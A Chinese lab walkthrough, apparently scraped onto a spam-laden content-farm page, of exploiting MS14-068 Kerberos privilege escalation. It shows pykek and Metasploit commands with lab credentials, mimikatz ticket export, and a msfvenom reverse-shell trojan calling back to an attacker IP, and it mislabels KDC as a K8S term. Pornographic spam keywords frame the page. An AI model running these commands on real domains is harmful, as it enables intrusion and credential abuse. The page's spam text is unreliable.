日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

域控 批量导入 用户_kerberos域用户提权分析

發(fā)布時間:2024/10/8 编程问答 29 豆豆
生活随笔 收集整理的這篇文章主要介紹了 域控 批量导入 用户_kerberos域用户提权分析 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

2014年,微軟發(fā)布了一個緊急補丁,修復(fù)了Kerberos域用戶提權(quán)漏洞(MS14-068),所有的Windows服務(wù)器操作系統(tǒng)都受到該漏洞的影響。該漏洞允許攻擊者將域內(nèi)任意用戶權(quán)限,提升到域管理員級別。如果想利用這個漏洞,把自己變成域控管理員,只需要知道:

  • 域內(nèi)任意用戶名
  • SID
  • 密碼
  • 域控IP地址

反正我覺得這本書上,對這一塊講的不咋滴,至少我沒看到特權(quán)體現(xiàn)在哪?不知道大家怎么看?不過放心,這個知名的漏洞,肯定還會有后續(xù)的實驗的~

漏洞原理:

  • 用戶向KDC(K8S秘鑰分發(fā)中心)申請TGT(身份憑證)時
  • 用戶可以偽造自己的票據(jù)
  • 如果票據(jù)聲明自己有域管理員權(quán)限
  • 而KDC在處理該票據(jù)時未驗證票據(jù)的簽名
  • 那么返回給用戶的TGT就擁有域管理員權(quán)限
  • 用戶將有域管理員權(quán)限的TGT發(fā)送到TGS(票據(jù)授權(quán)服務(wù))
  • 就會獲得特權(quán)ST(服務(wù)票據(jù))
  • 于是可以訪問域內(nèi)的一切資源

步驟一:查看域控制器的補丁

  • 沒有KB3011780補丁
  • 存在CVE-2014-6324(MS14-068漏洞)

步驟二:查看用戶的SID

  • ailx32:SID=S-1-5-21-1632228486-913648825-264583114-1001
  • Administrator:SID=S-1-5-21-1632228486-913648825-264583114-500

步驟三:克隆pykek

  • 下載地址:github項目
  • ms14-068.py是pykek工具包中的漏洞利用腳本

步驟四:生成高權(quán)限票據(jù)

  • 普通域用戶名:ailx32
  • 域:hackbiji.top
  • 普通SID:S-1-5-21-1632228486-913648825-264583114-1001
  • 域控IP: 192.168.160.143
  • 普通賬號密碼:W2ngluoanquan
python ms14-068.py -u ailx32@hackbiji.top -s S-1-5-21-1632228486-913648825-264583114-1001 -d 192.168.160.143 -p W2ngluoanquan

步驟五:驗證權(quán)限

  • 低權(quán)限的票據(jù),無效

  • 高權(quán)限票據(jù),無效

  • 最后結(jié)論就是,我票據(jù)確實導(dǎo)入了呀
  • 但是它死活不能用普通身份獲得IPC通道


  • 如果知道用戶名和密碼,那么是可以直接獲得IPC通道的呀
  • 何必搞的那么復(fù)雜呢?

  • 更可氣的是,我啥也沒干,通過管理員權(quán)限運行cmd,就已經(jīng)拿到IPC權(quán)限了
  • 蜜汁操作


后續(xù)實驗來了:抓緊時間收藏~

一、在metasploit中實驗

  • 利用ms14-068漏洞
  • 生成20200926141524_default_192.168.160.143_windows.kerberos_231623.bin
  • 需要通過mimikatz進行一下格式轉(zhuǎn)換
use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

二、在mimikatz中進行格式轉(zhuǎn)換

  • 獲得kirbi格式的文件
  • 留著后面提權(quán)用
kerberos::clist "20200926141524_default_192.168.160.143_windows.kerberos_231623.bin" /export

三、生成一個反向shell的木馬

  • 獲得hack.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.160.140 LPORT=5555 -f exe > hack.exe

四、監(jiān)聽木馬的來信

  • 通過metasploit監(jiān)聽5555端口
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 0.0.0.0 set lport 5555

五、魚兒上鉤

  • 獲得普通權(quán)限 hackbijiailx32

六、導(dǎo)入票據(jù)

  • 狗屁,報錯(Kerberos ticket application failed.)
  • 騙子

本篇完~

總結(jié)

以上是生活随笔為你收集整理的域控 批量导入 用户_kerberos域用户提权分析的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 婷婷91 | 国产一区二三区 | 久久性生活片 | 青青青手机在线视频 | 97se亚洲综合 | av毛片精品 | 精品日韩| 91精品视频在线播放 | 又大又粗又爽18禁免费看 | 波多野结衣一本一道 | 国模私拍av| 美日韩一区 | 视频在线观看一区二区 | 激情91| 午夜精品福利一区二区 | 性激烈视频在线观看 | av天天在线| 国产激情久久久久久熟女老人av | 国内精品视频在线观看 | 男女www视频| 天天久久综合 | 国产永久在线 | 色婷婷yy | 日本免费爱爱视频 | 亚洲成av | 久久777 | exo妈妈mv在线播放免费 | 黄污视频在线观看 | 欧美精品一区二区在线观看 | 亚洲精品一区二区三区在线观看 | 欧美污视频 | 91爱爱爱爱 | 妖精视频在线观看 | 欧美女优一区二区 | 男人的天堂亚洲 | 国产中文自拍 | いいなり北条麻妃av101 | 日韩av有码 | 欧洲精品一区二区三区久久 | 能免费看黄色的网站 | av九九九 | 久久少妇网 | 国产成人手机在线 | 国产午夜福利精品 | 欧美一级大片在线观看 | 女同久久另类69精品国产 | 黑丝美女av | 欧美不卡在线视频 | 91视频综合网 | 久操精品| 在线观看日韩国产 | 色欧美亚洲| 一边摸一边做爽的视频17国产 | 亚洲精品影院 | 欧美大肚乱孕交hd孕妇 | 国产嫩草在线 | 免费一级黄色大片 | 亚洲天堂2014 | 亚欧毛片| 在线观看你懂的网址 | 精品一区二区三区久久 | 亚洲精品乱码久久久久久不卡 | 日韩av午夜 | 国产日韩中文字幕 | 少妇高潮av | 8x8ⅹ国产精品一区二区 | 亚洲一级二级三级 | 久久在线 | 国产精品视频免费播放 | 久草操| 中日韩中文字幕一区二区 | 麻豆综合网 | 国产精品天天av精麻传媒 | 57pao国产成永久免费视频 | 欧美一a| 韩国美女视频在线观看18 | 久久在线观看 | 亚洲国产亚洲 | 国产经典一区二区三区 | 伊人论坛 | 一级女性全黄久久生活片免费 | 大尺度床戏揉捏胸视频 | av福利在线看 | 国产福利视频在线观看 | 少妇高潮一区二区三区在线 | 亚洲成人中文字幕 | 日本高清免费aaaaa大片视频 | 黑丝少妇喷水 | 亚洲永久精品一区 | 伊人婷婷久久 | 久久久艹 | 日韩精品久久 | 四虎8848| 午夜之声l性8电台lx8电台 | 久久久www成人免费毛片 | 日韩中文在线视频 | 精品www| 九九亚洲精品 | 五月天婷婷网站 |